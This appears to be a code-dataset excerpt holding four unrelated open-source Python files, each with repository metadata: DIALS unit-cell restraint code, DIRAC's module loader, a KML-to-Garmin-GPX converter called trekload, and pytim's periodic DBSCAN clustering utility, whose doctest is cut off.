sigma[1] = 0.0
if abs(a - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[2])]
if max(grad_diff) < 1e-10:
# a and c are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[0] > 0.0 and sigma[2] > 0.0:
logger.debug(
msg.format("a", "c", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[0], sigma[2]])
sigma[0] = strong
sigma[2] = 0.0
if abs(b - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[1], grads[2])]
if max(grad_diff) < 1e-10:
# b and c are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[1] > 0.0 and sigma[2] > 0.0:
logger.debug(
msg.format("b", "c", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[1], sigma[2]])
sigma[1] = strong
sigma[2] = 0.0
# A gradient of zero indicates that cell parameter is constrained and thus
# to be ignored in restraints
# _sigma = []
msg = (
"Unit cell similarity restraints were requested for the {0} "
"parameter, however for the crystal in experiment {1}, {0} is "
"constrained. This restraint will be removed for all crystals in "
"the restrained group."
)
for i, (grad, pname) in enumerate(
zip(grads, ["a", "b", "c", "alpha", "beta", "gamma"])
):
tst = (abs(g) <= 1.0e-10 for g in grad)
if all(tst):
# this parameter is constrained, so remove any requested restraints
# at this position
if sigma[i] > 0.0:
logger.debug(msg.format(pname, xlucp.get_experiment_ids()[0]))
sigma[i] = 0.0
# set the selection for gradient calculations to the unconstrained parameters
self._sel = [s > 0.0 for s in sigma]
self.nrestraints_per_cell = self._sel.count(True)
# repeat the weights for each unit cell being restrained
weights = [1.0 / s**2 for s in sigma if s > 0.0]
weights = [flex.double(self._nxls, w) for w in weights]
self._weights = weights[0]
for w in weights[1:]:
self._weights.extend(w)
@staticmethod
def average_fn(vals):
return flex.mean(vals)
def residuals(self):
"""Calculate and return the residuals"""
cells = [
xlucp.get_model().get_unit_cell().parameters() for xlucp in self._xlucp
]
a, b, c, aa, bb, cc = [flex.double(e) for e in zip(*cells)]
resid_a = a - self.average_fn(a) if self._sel[0] else None
resid_b = b - self.average_fn(b) if self._sel[1] else None
resid_c = c - self.average_fn(c) if self._sel[2] else None
resid_aa = aa - self.average_fn(aa) if self._sel[3] else None
resid_bb = bb - self.average_fn(bb) if self._sel[4] else None
resid_cc = cc - self.average_fn(cc) if self._sel[5] else None
# collect the residuals for restrained parameters only
resid = [
e
for e in [resid_a, resid_b, resid_c, resid_aa, resid_bb, resid_cc]
if e is not None
]
# stack the columns
R = resid[0]
for r in resid[1:]:
R.extend(r)
return R
@property
def num_residuals(self):
"""Get the number of residuals"""
return self.nrestraints_per_cell * self._nxls
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
mean_grads = param_grads * self._meangradfac
param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, (g, mg) in enumerate(zip(param_grads, mean_grads)):
if abs(mg) > 1e-20: # skip gradients close to zero
col = flex.double(flex.grid(self._nxls, 1), -1.0 * mg)
block.assign_block(col, 0, j)
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
def gradients(self):
"""A generator function to return the gradients dR/dp for all the restraints
referring to a particular crystal's cell parameters. The return value is
a list of sparse matrices, one for each of the 6 cell parameters being
restrained. Each sparse matrix has as many columns as the crystal unit
cell parameterisation has parameters, and as many rows as there are crystals
being restrained. Gradients of zero are detected and not set in the sparse
matrices to save memory."""
for i, xlucp in enumerate(self._xlucp):
B = xlucp.get_state()
dB_dp = flex.mat3_double(xlucp.get_ds_dp())
# Use C++ function for speed
ccg = CalculateCellGradients(B, dB_dp)
dRdp = []
if self._sel[0]:
dRdp.append(self._construct_grad_block(ccg.da_dp(), i))
if self._sel[1]:
dRdp.append(self._construct_grad_block(ccg.db_dp(), i))
if self._sel[2]:
dRdp.append(self._construct_grad_block(ccg.dc_dp(), i))
if self._sel[3]:
dRdp.append(self._construct_grad_block(ccg.daa_dp(), i))
if self._sel[4]:
dRdp.append(self._construct_grad_block(ccg.dbb_dp(), i))
if self._sel[5]:
dRdp.append(self._construct_grad_block(ccg.dcc_dp(), i))
yield dRdp
def weights(self):
"""Return the weights for the residuals vector"""
return self._weights
class LowMemoryMeanUnitCellTie(MeanUnitCellTie):
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, g in enumerate(param_grads):
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
class MedianUnitCellTie(MeanUnitCellTie):
@staticmethod
def average_fn(vals):
return flex.median(vals)
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
# this override removes the product with self._gradfac, which is only
# relevant for the 'mean' versions of this class.
# param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, g in enumerate(param_grads):
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
|
dials/dials
|
algorithms/refinement/restraints/restraints.py
|
Python
|
bsd-3-clause
| 17,973
|
[
"CRYSTAL"
] |
ad1eacd544e6339a11da9450bd48c7d6bba4cc7dfc6690393d3cf566809c3359
|
import re
import types
import imp
import pkgutil
import collections
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities import List, DIRACSingleton
from DIRAC.ConfigurationSystem.Client.Helpers import CSGlobals
class ObjectLoader( object ):
__metaclass__ = DIRACSingleton.DIRACSingleton
def __init__( self, baseModules = False ):
""" init
"""
if not baseModules:
baseModules = [ 'DIRAC' ]
self.__rootModules = baseModules
self.__objs = {}
self.__generateRootModules( baseModules )
def __rootImport( self, modName, hideExceptions = False ):
""" Auto search which root module has to be used
"""
for rootModule in self.__rootModules:
impName = modName
if rootModule:
impName = "%s.%s" % ( rootModule, impName )
gLogger.debug( "Trying to load %s" % impName )
result = self.__recurseImport( impName, hideExceptions = hideExceptions )
#Error. Something cannot be imported. Return error
if not result[ 'OK' ]:
return result
#Huge success!
if result[ 'Value' ]:
return S_OK( ( impName, result[ 'Value' ] ) )
#Nothing found, continue
#Return nothing found
return S_OK()
def __recurseImport( self, modName, parentModule = None, hideExceptions = False, fullName = False ):
""" Internal function to load modules
"""
if type( modName ) in types.StringTypes:
modName = List.fromChar( modName, "." )
if not fullName:
fullName = ".".join( modName )
if fullName in self.__objs:
return S_OK( self.__objs[ fullName ] )
try:
if parentModule:
impData = imp.find_module( modName[0], parentModule.__path__ )
else:
impData = imp.find_module( modName[0] )
impModule = imp.load_module( modName[0], *impData )
if impData[0]:
impData[0].close()
except ImportError, excp:
if str( excp ).find( "No module named %s" % modName[0] ) == 0:
return S_OK( None )
errMsg = "Can't load %s in %s" % ( ".".join( modName ), parentModule.__path__[0] )
if not hideExceptions:
gLogger.exception( errMsg )
return S_ERROR( errMsg )
if len( modName ) == 1:
self.__objs[ fullName ] = impModule
return S_OK( impModule )
return self.__recurseImport( modName[1:], impModule,
hideExceptions = hideExceptions, fullName = fullName )
def __generateRootModules( self, baseModules ):
""" Iterate over all the possible root modules
"""
self.__rootModules = baseModules
for rootModule in reversed( CSGlobals.getCSExtensions() ):
if rootModule[-5:] != "DIRAC" and rootModule not in self.__rootModules:
self.__rootModules.append( "%sDIRAC" % rootModule )
self.__rootModules.append( "" )
def loadModule( self, importString ):
""" Load a module from an import string
"""
result = self.__rootImport( importString )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
return S_ERROR( "No module %s found" % importString )
return S_OK( result[ 'Value' ][1] )
def loadObject( self, importString, objName = False ):
""" Load an object from inside a module
"""
result = self.loadModule( importString )
if not result[ 'OK' ]:
return result
modObj = result[ 'Value' ]
if not objName:
objName = List.fromChar( importString, "." )[-1]
try:
return S_OK( getattr( modObj, objName ) )
except AttributeError:
return S_ERROR( "%s does not contain a %s object" % ( importString, objName ) )
def getObjects( self, modulePath, reFilter = None, parentClass = None, recurse = False ):
"""
Search for modules under a certain path
modulePath is the import string needed to access the parent module. Root modules will be included automatically (like DIRAC). For instance "ConfigurationSystem.Service"
reFilter is a regular expression to filter what to load. For instance ".*Handler"
parentClass is a class object from which the loaded modules have to import from. For instance RequestHandler
"""
if 'OrderedDict' in dir( collections ):
modules = collections.OrderedDict()
else:
modules = {}
if type( reFilter ) in types.StringTypes:
reFilter = re.compile( reFilter )
for rootModule in self.__rootModules:
if rootModule:
impPath = "%s.%s" % ( rootModule, modulePath )
else:
impPath = modulePath
gLogger.debug( "Trying to load %s" % impPath )
result = self.__recurseImport( impPath )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
continue
parentModule = result[ 'Value' ]
fsPath = parentModule.__path__[0]
gLogger.verbose( "Loaded module %s at %s" % ( impPath, fsPath ) )
for modLoader, modName, isPkg in pkgutil.walk_packages( parentModule.__path__ ):
if reFilter and not reFilter.match( modName ):
continue
if isPkg:
if recurse:
result = self.getObjects( "%s.%s" % ( modulePath, modName ), reFilter = reFilter,
parentClass = parentClass, recurse = recurse )
if not result[ 'OK' ]:
return result
modules.update( result[ 'Value' ] )
continue
modKeyName = "%s.%s" % ( modulePath, modName )
if modKeyName in modules:
continue
fullName = "%s.%s" % ( impPath, modName )
result = self.__recurseImport( modName, parentModule = parentModule, fullName = fullName )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
continue
modObj = result[ 'Value' ]
try:
modClass = getattr( modObj, modName )
except AttributeError:
gLogger.warn( "%s does not contain a %s object" % ( fullName, modName ) )
continue
if parentClass and not issubclass( modClass, parentClass ):
continue
#Huge success!
modules[ modKeyName ] = modClass
return S_OK( modules )
|
avedaee/DIRAC
|
Core/Utilities/ObjectLoader.py
|
Python
|
gpl-3.0
| 6,137
|
[
"DIRAC"
] |
f8c49d359641c756317428f8c8d18ff9d5f902b34d9dfb8b2ef5a4667219fe37
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Trekload is licensed under the Revised BSD License:
#
# Copyright (c) 2013, Arvid Rudling
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The name(s) of its contributor(s) may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#TODO (bugs):
# handle style mappings embedded in waypoints
# handle Polygon
#User configured and test icon IDs
from trekload_conf import kml_to_ggpx_overrides, test_items
import unicodedata
import argparse
import os.path
import glob
import logging
import re
from random import random
from lxml import etree
import lxml.html.clean
#Garmin symbol code references are available here:
# http://home.online.no/~sigurdhu/MapSource-text.htm
# http://home.online.no/~sigurdhu/12MAP_symbols.htm
### Fenix specific constants
WAYPOINT_MEM_RESERVE = 25
FENIX_MAX_WAYPOINTS = 1000
FENIX_SYM_MISSING = (
'Ball Park',
'Bar',
'Beach',
'Bell',
'Bike Trail',
'Blue Pin',
'Bridge',
'Cemetery',
'Circle with X',
'City (Capitol)',
'City (small)',
'Civil',
'Civil',
'Contact, Biker',
'Contact, Ranger',
'Controlled Area',
'Convenience Store',
'Crossing',
'Dam',
'Danger Area',
'Diver Down Flag 1',
'Diver Down Flag 2',
'Drinking Water',
'Exit',
'Fast Food',
'Forest',
'Green Diamond',
'Green Square',
'Horn',
'Hunting Area',
'Ice Skating Area',
'Large City',
'Light',
'Medium City',
'Movie Theater',
'Museum',
'Navaid, Amber',
'Navaid, White',
'Oil Field',
'Parking Area',
'Parking',
'Pharmacy',
'Pizza',
'Police Station',
'Post Office',
'Radio Beacon',
'Red Square',
'Restricted Area',
'RV Park',
'Scales',
'School',
'Shopping Center',
'Shopping',
'Short Tower',
'Small City',
'Summit',
'Tall Tower',
'Theater',
'Toll Booth',
'Truck Stop',
'Tunnel',
'Water Hydrant',
'White Buoy',
'Zoo',
)
FENIX_SYM_SET = (
'Airport',
'Amusement Park',
'Anchor',
'Bank',
'Boat Ramp',
'Building',
'Campground',
'Car',
'Dot, White',
'Fishing Area',
'Flag, Blue',
'Gas Station',
'Geocache Found',
'Geocache',
'Ghost Town',
'Golf Course',
'Heliport',
'Information',
'Levee',
'Lodging',
'Medical Facility',
'Military'
'Parachute Area',
'Park',
'Picnic Area',
'Private Field', #rendered like 'Restricted Area'
'Residence',
'Restaurant',
'Restroom',
'Scenic Area',
'Skiing Area',
'Skull and Crossbones',
'Soft Field',
'Swimming Area',
'Telephone',
'Trail Head',
'Waypoint',
)
### Generic symbol constants
SYMBOL_DEFAULT = 'White Dot'
#Standard KML icon equivalents
kml_to_ggpx_symbols = { #'http://maps.google.com/mapfiles/kml/shapes/grocery.png':'Shopping Center',
#'http://mw1.google.com/mw-earth-vectordb/smartmaps_icons/museum-15.png':'Museum', 'http://maps.google.com/mapfiles/kml/pal4/icon61.png':'Flag, Blue',
'http://maps.google.com/mapfiles/kml/shapes/cabs.png': 'Car',
'http://maps.google.com/mapfiles/kml/shapes/camera.png': 'Scenic Area',
'http://maps.google.com/mapfiles/kml/shapes/campground.png': 'Campground',
'http://maps.google.com/mapfiles/kml/shapes/caution.png': 'Skull and Crossbones',
'http://maps.google.com/mapfiles/kml/shapes/dining.png': 'Restaurant',
'http://maps.google.com/mapfiles/kml/shapes/dollar.png': 'Bank',
'http://maps.google.com/mapfiles/kml/shapes/fishing.png': 'Fishing Area',
'http://maps.google.com/mapfiles/kml/shapes/flag.png': 'Flag, Blue',
'http://maps.google.com/mapfiles/kml/shapes/gas_stations.png': 'Gas Station',
'http://maps.google.com/mapfiles/kml/shapes/golf.png': 'Golf Course',
'http://maps.google.com/mapfiles/kml/shapes/hiker.png': 'Trail Head',
'http://maps.google.com/mapfiles/kml/shapes/homegardenbusiness.png': 'Residence',
'http://maps.google.com/mapfiles/kml/shapes/hospitals.png': 'Medical Facility',
'http://maps.google.com/mapfiles/kml/shapes/info_circle.png': 'Information',
'http://maps.google.com/mapfiles/kml/shapes/lodging.png': 'Lodging',
'http://maps.google.com/mapfiles/kml/shapes/marina.png': 'Anchor',
'http://maps.google.com/mapfiles/kml/shapes/open-diamond.png': 'Dot, White',
'http://maps.google.com/mapfiles/kml/shapes/parking_lot.png': 'Car',
'http://maps.google.com/mapfiles/kml/shapes/parks.png': 'Park',
'http://maps.google.com/mapfiles/kml/shapes/phone.png': 'Telephone',
'http://maps.google.com/mapfiles/kml/shapes/picnic.png': 'Picnic Area',
'http://maps.google.com/mapfiles/kml/shapes/poi.png': 'Waypoint',
'http://maps.google.com/mapfiles/kml/shapes/ski.png': 'Skiing Area',
'http://maps.google.com/mapfiles/kml/shapes/swimming.png': 'Swimming Area',
'http://maps.google.com/mapfiles/kml/shapes/toilets.png': 'Restroom',
'http://maps.google.com/mapfiles/kml/shapes/airports.png': 'Airport',
'': SYMBOL_DEFAULT
}
kml_to_ggpx_symbols.update(kml_to_ggpx_overrides)
kml_to_ggpx_misses = set()
### KML & GPX format constants
gpx_version = "1.0"
kml_ns = {'kml': 'http://www.opengis.net/kml/2.2'}
# String that gets appended to the wp name when tracks are collapsed to their
# median points ('--tracks point' option)
median_point_suffix = '(mitten)'
class Track(object):
"""Represents a GIS track (multi-segment path between two locations)"""
def __init__(self, coords, name='Untitled', icon=None, description=None):
self.coords = []
self.coords.extend(coords)
self.name = name.encode('utf8')
self.icons = {}
self.description = description
if icon:
self._set_icon(icon[0], icon[1])
def _set_icon(self, format, id):
global kml_to_ggpx_misses
self.icons[format] = id
if format == 'kml':
if id in kml_to_ggpx_symbols:
self.icons['ggpx'] = kml_to_ggpx_symbols[self.icons['kml']]
else:
kml_to_ggpx_misses.add(self.icons['kml'])
self.icons['ggpx'] = None
@staticmethod
def _make_point(parent, coord, type_code):
wpt = etree.SubElement(parent, type_code, lat=str(coord[0]), lon=str(coord[1]))
if len(coord) == 3 and coord[2] != 0.0:
ele = etree.SubElement(wpt, 'ele')
ele.text = str(coord[2])
return wpt
def _make_metadata(self, parent, option=''):
name = etree.SubElement(parent, 'name')
#name.text = etree.CDATA(self.name.decode('utf-8'))
if option == 'point':
name.text = "%s %s" % (self.name.decode('utf-8'), median_point_suffix)
else:
name.text = self.name.decode('utf-8')
sym = etree.SubElement(parent, 'sym')
if 'ggpx' in self.icons:
sym.text = self.icons['ggpx']
else:
sym.text = SYMBOL_DEFAULT
if self.description:
desc = etree.SubElement(parent, 'desc')
#desc.text = etree.CDATA(self.description)
if len(self.description) > 50:
desc.text = self.description[0:49] + u"…"
else:
desc.text = self.description
def output_GPX(self, parent, option):
elem = None
if option == 'full':
elem = etree.SubElement(parent, 'trk')
seg = etree.SubElement(elem, 'trkseg')
assert (len(self.coords) > 0)
for c in self.coords:
Track._make_point(seg, c, type_code='trkpt')
elif option == 'point':
pt = self.coords[len(self.coords) / 2]
elem = Track._make_point(parent, pt, type_code='wpt')
if elem is None:
assert (option == 'skip')
else:
self._make_metadata(elem, option)
def __str__(self):
return "%s: %s, - %s" % (
self.name,
self.coords,
self.icons)
class Waypoint(Track):
"""Representation of GIS waypoint"""
def __init__(self, coord3D, name='Untitled', icon=None, description=None):
Track.__init__(self, [coord3D], name, icon, description)
def output_GPX(self, parent, option=''):
if len(self.coords) == 1:
wpt = Waypoint._make_point(parent, self.coords[0], type_code='wpt')
self._make_metadata(wpt)
else:
assert (len(self.coords) == 0)
class KMLDocument(object):
"""KML document loader/parser class"""
def __init__(self, path):
self.path = path
self.data = None
self.stylemap = {}
self.waypoints = []
def read(self):
"""Read KML data from file at self.path"""
kml = etree.parse(self.path)
style_definitions = {}
line_string_pattern = re.compile(
"\s*(?:([-]?[\d]*[\.]?[\d]+),)(?:([-]?[\d]*[\.]?[\d]+),)?([-]?[\d]*[\.]?[\d]+)\s+")
#read style definitions
for style in kml.xpath('//kml:Document/kml:Style', namespaces=kml_ns):
id = style.attrib['id']
assert id
icon_list = style.xpath('kml:IconStyle/kml:Icon/kml:href', namespaces=kml_ns)
if len(icon_list) > 0:
icon_href = icon_list[0].text
else:
icon_href = ''
style_definitions[id] = icon_href
#generate self.stylemap from style_definitions and StyleMap pairs
for style_mapping in kml.xpath('//kml:Document/kml:StyleMap', namespaces=kml_ns):
url = None
for pair in style_mapping.xpath('kml:Pair', namespaces=kml_ns):
if pair.findtext('kml:key', namespaces=kml_ns) == 'normal':
style_url = pair.findtext('kml:styleUrl', namespaces=kml_ns)[1:]
assert (style_url)
self.stylemap[style_mapping.attrib['id']] = style_definitions[style_url]
#logging.debug( "%s -> %s" % (style_mapping.attrib['id'], style_definitions[style_urself. for placemark in kml.xpath('//kml:Placemark', namespaces=kml_ns):)
for placemark in kml.xpath('//kml:Placemark', namespaces=kml_ns):
points = placemark.xpath('kml:Point', namespaces=kml_ns)
name = placemark.findtext('kml:name', namespaces=kml_ns)
style = placemark.findtext('kml:styleUrl', namespaces=kml_ns)
desc_str = placemark.findtext('kml:description', namespaces=kml_ns)
desc = None
if desc_str:
desc_html = lxml.html.fromstring(desc_str)
cleaner = lxml.html.clean.Cleaner(allow_tags=[], remove_unknown_tags=True)
stripped_html = cleaner.clean_html(desc_html)
desc = stripped_html.text_content()
if style is not None:
if style[0] == '#':
style = style[1:]
if style in self.stylemap:
icon = self.stylemap[style]
else:
icon = None
logging.warning("Could not find style mapping %s on %s, skipping icon" % (style, name))
else:
icon = style
else:
icon = None
#TODO: support inline style mappings
logging.warning("No style URL for %s, skipping icon" % name)
coords = []
if len(points) == 1:
point = points[0]
raw_coords = point.findtext('kml:coordinates', namespaces=kml_ns).split(',')
if len(raw_coords) >= 3:
point = (float(raw_coords[1]), float(raw_coords[0]), float(raw_coords[2]))
else:
point = (float(raw_coords[1]), float(raw_coords[0]))
read_waypoint = Waypoint(point, name, ('kml', icon), description=desc)
self.waypoints.append(read_waypoint)
else:
line_coords_chunk = placemark.findtext('kml:LineString/kml:coordinates', namespaces=kml_ns)
if line_coords_chunk is not None:
line_tokens = line_string_pattern.findall(line_coords_chunk)
try:
for c in line_tokens:
if len(c) == 2:
coords.append((float(c[1]), float(c[0]), float(c[2])))
else:
coords.append((float(c[1]), float(c[0])))
except ValueError:
logging.error("Could not parse %s (%s) to float coordinates" % (c, name))
raise
read_track = Track(coords, name, ('kml', icon), description=desc)
self.waypoints.append(read_track)
else:
polygon = placemark.findtext('kml:Polygon', namespaces=kml_ns)
if polygon is not None:
#TODO: support polygons, could be output as tracks
logging.error("Skipping '%s' - polygon placemarks not currently supported" % name)
else:
erroneous_features = placemark.xpath('kml:*', namespaces=kml_ns)
error_descriptions = []
for err in erroneous_features:
error_descriptions.append(err.tag.split('}')[1])
logging.error(
"Skipping '%s' b/c unrecognized placemark contents (%s)" % (name, str(", ").join(error_descriptions)))
class GarminGPXDocument(object):
"""GPX file writer"""
def __init__(self, name='output'):
udata = name.decode("utf-8")
#Make name pure ASCII and lowercase to improve chances of name matches
#between subsequent runs
self.name = udata.encode('ascii', 'ignore').lower()
self.waypoints = []
self.data = etree.Element('gpx',
version=gpx_version,
creator='trekload',
#attrib={'{xsi}schemaLocation':'http://www.topografix.com/GPX/1/0/gpx.xsd'},
nsmap={ #'wptx1' : 'http://www.garmin.com/xmlschemas/WaypointExtension/v1',
#'gpxx':'http://www.garmin.com/xmlschemas/GpxExtensions/v3',
#'gpxtpx':'http://www.garmin.com/xmlschemas/TrackPointExtension/v1',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
None: 'http://www.topografix.com/GPX/1/0'}
)
self.xml = etree.ElementTree(self.data)
def add_points(self, wpoint_list):
for wpoint in wpoint_list:
self.add_point(wpoint)
def add_point(self, wpoint):
self.waypoints.append(wpoint)
def close(self, option):
# Save to XML file
previous_paths = glob.glob("%s_*[0-9].gpx" % self.name)
new_path = '%s_%d.gpx' % (self.name, len(self.waypoints))
output_file = open(new_path, 'wb')
for wp in self.waypoints:
wp.output_GPX(self.data, option=option)
self.xml.write(output_file, xml_declaration=True, encoding='utf-8')
if len(previous_paths) == 1:
#Only delete previous file if exactly 1 was found
previous_file_path = previous_paths[0]
if not os.path.samefile(previous_file_path, new_path):
#If name of new file is the same, it has been overwritten
logging.info("Deleting previous file %s" % previous_file_path)
os.remove(previous_file_path)
elif len(previous_paths) > 1:
#if several were found, display warning
logging.warning("""Found more than one previous file (%d).
To avoid data loss, you have to manually delete previous files.
New file name is '%s'""" % (len(previous_paths), new_path))
### Main program flow
parser = argparse.ArgumentParser(description='Process KML data and write to Garmin Fenix as .gpx')
parser.add_argument('--test', action="store_true",
help='Output test gpx with symbols 0-test max')
parser.add_argument('--tracks', default='point',
help='KML tracks: full, point or skip. Default: point')
parser.add_argument('--dest', metavar='OUTPUT', default=None,
help="Specify a destination for output file. Must be a directory. Default: Fenix' GPX folder")
parser.add_argument('--input', default=os.path.expanduser('~/Desktop/'),
help='Input KML file (ignored in test mode)')
parser.add_argument('--log', default='debug',
help='Logging level')
args = parser.parse_args()
#Logging
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(args.log, logging.NOTSET)
logging.basicConfig(level=logging.DEBUG)
#Destination
if args.dest is None:
dest_dir = "/Volumes/GARMIN/Garmin/GPX/"
if not os.path.isdir(dest_dir):
raise IOError(u"Fenix is not mounted. Check your connections or specify a different destination argument")
else:
dest_dir = os.path.abspath(args.dest)
assert (os.path.isdir(dest_dir))
waypoint_counter = 0
if args.test:
#Test mode
test_center = (59.6, 16.53)
test_radius = 0.1
output_doc = GarminGPXDocument(os.path.join(dest_dir, 'trekload_test'))
test_step = test_radius / (len(test_items) + 1)
r = test_step
#for d in range(0, args.test):
for d in test_items:
direction = [random() * 2.0 - 1.0, random() * 2.0 - 1.0]
r += test_step
offset = [v * r for v in direction]
test_point = [test_center[i] + offset[i] for i in range(0, 2)]
test_wp = Waypoint(test_point, name=d, icon=('ggpx', str(d)))
output_doc.add_point(test_wp)
output_doc.close()
else:
#regular conversion (non-test) mode
#input file/dir
input_ = os.path.abspath(args.input)
input_files = []
if os.path.isdir(input_):
for fileName in os.listdir(input_):
splitName = os.path.splitext(fileName)
if len(splitName) > 1:
fileType = splitName[1]
if fileType.lower() == '.kml':
input_files.append(os.path.join(input_, fileName))
else:
assert (os.path.exists(input_))
input_files.append(input_)
#Iterate through input files
for input_file in input_files:
dest_filename = os.path.splitext(os.path.basename(input_file))[0]
output_doc = GarminGPXDocument(os.path.join(dest_dir, dest_filename))
input_ = KMLDocument(input_file)
input_.read()
output_doc.add_points(input_.waypoints)
output_doc.close(option=args.tracks)
num_waypoints = len(output_doc.waypoints)
logging.info("Wrote %s\t(%d waypoints)" % (dest_filename, num_waypoints))
waypoint_counter += num_waypoints
#Report number of waypoints written
if kml_to_ggpx_misses:
print ("The following icons have no GGPX->KML, their placemarks were written without icon:")
for miss in kml_to_ggpx_misses:
print "'%s': '???'," % miss
#FIXME: actually counts number of waypoints AND tracks
#(each complete track counts as one point)
if waypoint_counter >= FENIX_MAX_WAYPOINTS:
logging.warning("Waypoint memory exhausted (%s) by this loading session" % waypoint_counter)
elif waypoint_counter > FENIX_MAX_WAYPOINTS - WAYPOINT_MEM_RESERVE:
logging.warning("Waypoint memory almost exhausted (%s) by this loading session" % waypoint_counter)
else:
logging.info("Wrote %d tracks or waypoints" % waypoint_counter)
|
arru/trekload
|
trekload.py
|
Python
|
bsd-3-clause
| 18,631
|
[
"Amber"
] |
a048dda055501ed3d8d529514ff6a05fa2e6065a219ae96d02ca9ebb288858ff
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
from __future__ import print_function
import numpy as np
from scipy.cluster import vq
from scipy.spatial import cKDTree
from pytim_dbscan import dbscan_inner
def determine_samples(threshold_density, cluster_cut, n_neighbors):
if isinstance(threshold_density, type(None)):
return 2
if isinstance(threshold_density, (float, int)):
min_samples = threshold_density * 4. / 3. * np.pi * cluster_cut**3
elif (threshold_density == 'auto'):
modes = 2
centroid, _ = vq.kmeans2(
n_neighbors * 1.0, modes, iter=10, check_finite=False)
min_samples = np.max(centroid)
else:
raise ValueError("Wrong value of 'threshold_density' passed\
to do_cluster_analysis_DBSCAN() ")
return np.max([min_samples, 2])
def do_cluster_analysis_dbscan(group,
cluster_cut,
threshold_density=None,
molecular=True):
""" Performs a cluster analysis using DBSCAN
:returns [labels,counts,neighbors]: lists of the id of the cluster to
which every atom is belonging to, of the
number of elements in each cluster, and of
the number of neighbors for each atom
according to the specified criterion.
Uses a slightly modified version of DBSCAN from sklearn.cluster
that takes periodic boundary conditions into account (through
cKDTree's boxsize option) and collects also the sizes of all
clusters. This is on average O(N log N) thanks to the O(log N)
scaling of the kdtree.
"""
box = group.universe.dimensions[:3]
# NOTE: extra_cluster_groups are not yet implemented
points = group.atoms.positions[:]
tree = cKDTree(points, boxsize=box[:3])
neighborhoods = np.array([
np.array(neighbors)
for neighbors in tree.query_ball_point(points, cluster_cut, n_jobs=-1)
])
if len(neighborhoods.shape) != 1:
raise ValueError("Error in do_cluster_analysis_DBSCAN(), the cutoff\
is probably too small")
if molecular is False:
n_neighbors = np.array([len(neighbors) for neighbors in neighborhoods])
else:
n_neighbors = np.array([
len(np.unique(group[neighbors].resids))
for neighbors in neighborhoods
])
min_samples = determine_samples(threshold_density, cluster_cut,
n_neighbors)
labels = -np.ones(points.shape[0], dtype=np.intp)
counts = np.zeros(points.shape[0], dtype=np.intp)
core_samples = np.asarray(n_neighbors >= min_samples, dtype=np.uint8)
dbscan_inner(core_samples, neighborhoods, labels, counts)
return labels, counts, n_neighbors
def _():
"""
This is a collection of tests to check
that the DBSCAN behavior is kept consistent
>>> import MDAnalysis as mda
>>> import pytim
>>> pytim.utilities_dbscan._() ; # coverage
>>> import numpy as np
>>> from pytim.datafiles import ILBENZENE_GRO
>>> from pytim.utilities import do_cluster_analysis_dbscan as DBScan
>>> u = mda.Universe(ILBENZENE_GRO)
>>> benzene = u.select_atoms('name C and resname LIG')
>>> u.atoms.positions = u.atoms.pack_into_box()
>>> l,c,n = DBScan(benzene, cluster_cut = 4.5, threshold_density = None)
>>> l1,c1,n1 = DBScan(benzene, cluster_cut = 8.5, threshold_density = 'auto')
>>> td = 0.009
>>> l2,c2,n2 = DBScan(benzene, cluster_cut = 8.5, threshold_density = td)
>>> print (np.sort(c)[-2:])
